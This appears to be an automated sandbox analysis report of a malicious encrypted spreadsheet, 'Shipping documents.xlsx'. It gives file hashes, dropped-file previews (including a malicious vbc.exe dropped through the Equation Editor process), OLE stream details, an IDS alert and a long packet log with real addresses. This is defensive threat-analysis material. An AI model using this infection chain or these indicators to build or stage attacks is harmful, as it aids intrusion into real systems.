SSDEEP:	3072:mXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:0ahIFdyiaT2qtXw
MD5:	0579C6F9CBF859BB8D027309ACBD8291
SHA1:	52DF5DC83F6FF6D305A77B8EA9A442643BA0A1CD
SHA-256:	F88600367AAC384B1203C2CF056EAB16CE107CFD3D824BF7796DB041D8938481
SHA-512:	D2B2B2E3DEF0184F5D8ED136B769568980ADB7834923BD220B4517423639780B2E4B04F68409C11743BAD32C8D738D8CF904FB89C69626E73102663836B845F8
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i........................................................................N.[............p........N.[........ ....yfP........ ............zfP............O...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......4....2_P........p...p....{]P............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C197FD0D.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\Desktop\~$Shipping documents.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	478720
Entropy (8bit):	7.699517779790953
Encrypted:	false
SSDEEP:	12288:g0b4JO3QrN2iNXxHqSqi+owWODVm4q3ntt8LF:Lb4JO3yN1VxHsphm4wr8
MD5:	FD09F4D0B2373B9634F2D8AD2F5C899D
SHA1:	8074CD001665B9CA3FD0392CB74F8525D915A812
SHA-256:	F592906B568C6138386673B45E8ACBEC69CC736394C29BE98FBB1925A39CF23A
SHA-512:	B96DAC273A50ED07FC615CBAB935DF508D18EA6084A35D9AC85B580E8B43B2A40354F5B572836E8A438763F92861EDF6B57BFC0DAED8AA655B7785E090DE2513
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j._..............0..D...........b... ........@.. ....................................@.................................<b..O.................................................................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B................pb......H........r...c......x...L................................................0..G.........}.....(.......(......s....}.....{.....o.....(......{.....{....o.......0...........(.....{....{....(.......(....~....vl....,..{....{....o......{....{.....o....o......{....(....}.....o......3..{....{....o.......+....,@..{....{....o....s......{.....{....{....o......{....{....o.........{....( ...o!.....{....~....o".......{....(#...o!.....{....~....o".......0..+.........,..{.......+....,...{.

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.961115643227587
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Shipping documents.xlsx
File size:	201728
MD5:	c3524b3b21dae7ebf0d9ed6b6c10f5ec
SHA1:	72ebb819703693105a86d206a119f88821c84b54
SHA256:	aa610173afefde94cf914948a54de1d63b71475cdd0d9bb18e6f01d67a2076a9
SHA512:	e28890f1f94b1cd647cce3c34cfc6e718133892f358b85dc47555ca2a231dbf1bd3934cbf16d21d6988827e052b604b43d2ddc41e1f7649d7dfb2c4241d53056
SSDEEP:	6144:EMmGaiwsWbHBOG75ZYNQVtNzhXMcRqity3:EMhAbhOG75ZYOV+cVE
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Shipping documents.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 194696

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	194696
Entropy:	7.99819881034
Base64 Encoded:	True
Data ASCII:	v . . . . . . . . 5 . ; G L . R f d . . . . . . < . . . . . . . . q ~ . . . . \| \| & . . . . . L x . . . . . . . . 6 . . . . J \| T . . < . Q s J . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . . . . . 8 . . ~ [ . . . b . . . .
Data Raw:	76 f8 02 00 00 00 00 00 c1 35 0b 3b 47 4c 87 52 66 64 a6 af b6 10 89 fc 3c 12 b8 c5 d3 eb 9a 1d ab 71 7e aa 84 fe 84 7c 7c 26 af ca 00 d3 8c 4c 78 f4 c7 f6 df c0 11 87 ee 36 bf e4 12 09 4a 7c 54 09 83 3c c3 51 73 4a 02 d4 12 62 8a e0 a2 a8 dc b0 8a 38 84 0d 7e 5b 02 d4 12 62 8a e0 a2 a8 dc b0 8a 38 84 0d 7e 5b 02 d4 12 62 8a e0 a2 a8 dc b0 8a 38 84 0d 7e 5b 02 d4 12 62 8a e0 a2 a8

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.45220077
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . N f . / { h . + . S . . - . . . . Y } v ^ . h . . . . . . . . . . . . . E 2 p ~ . . . . . . . . . . . n . o . . " Y . W . r Q $ j . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/26/20-21:14:10.893620	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49170	23.227.38.74	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2020 21:13:00.120197058 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.238229990 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.238399982 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.238950968 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.358699083 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.358763933 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.358804941 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.358838081 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.358850956 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.358875036 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.358915091 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.358969927 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.477036953 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477102041 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477142096 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477180004 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477229118 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477277994 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.477298975 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.477334023 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477379084 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477421045 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.477473974 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.477495909 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.477545023 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.595695019 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.595763922 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.595803976 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.595844030 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.595880032 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.595927000 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.595973969 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.595995903 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596033096 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596076965 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596102953 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596129894 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596160889 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596203089 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596227884 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596277952 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596290112 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596338034 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596348047 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596388102 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596405029 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596443892 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596460104 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596487999 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596517086 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596560001 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.596577883 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.596606970 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.597809076 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.714837074 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.714909077 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.714950085 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.714988947 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715028048 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715094090 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715114117 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715128899 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715132952 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715189934 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715231895 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715266943 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715286970 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715310097 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715348959 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715374947 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715401888 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715421915 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715461016 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715485096 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715512037 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715533018 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715575933 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715595961 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715631008 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715663910 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715707064 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715727091 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715759039 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715792894 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715835094 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715857983 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715886116 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.715924025 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715966940 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.715986013 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716017008 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716043949 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716083050 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716101885 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716133118 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716157913 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716197968 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716221094 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716252089 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716284037 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716327906 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716345072 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716375113 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716403008 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716442108 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716459990 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716489077 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716522932 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716564894 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716582060 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716612101 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716639042 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716677904 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.716694117 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.716722012 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.717200041 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.835587025 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.835669994 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.835715055 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.835756063 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.835784912 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.835823059 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.835829020 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.835861921 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.835901976 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.835927963 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.835949898 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.835977077 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836015940 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836033106 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836071968 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836103916 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836153030 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836172104 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836209059 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836242914 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836297989 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836311102 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836354017 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836380005 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836430073 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836452961 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836494923 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836522102 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836577892 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836591005 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836633921 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836661100 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836709023 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836741924 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836766005 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836803913 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836843014 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836859941 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836895943 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.836918116 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836956024 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.836971045 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837008953 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837035894 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837079048 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837095976 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837138891 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837153912 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837193012 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837209940 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837248087 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837265968 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837304115 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837341070 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837352037 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837414980 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837445021 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837486982 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837507963 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837539911 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837565899 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837605000 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837621927 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837654114 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837687969 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837729931 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837748051 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837784052 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:00.837815046 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837863922 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:00.837874889 CET	49165	80	192.168.2.22	216.170.126.121
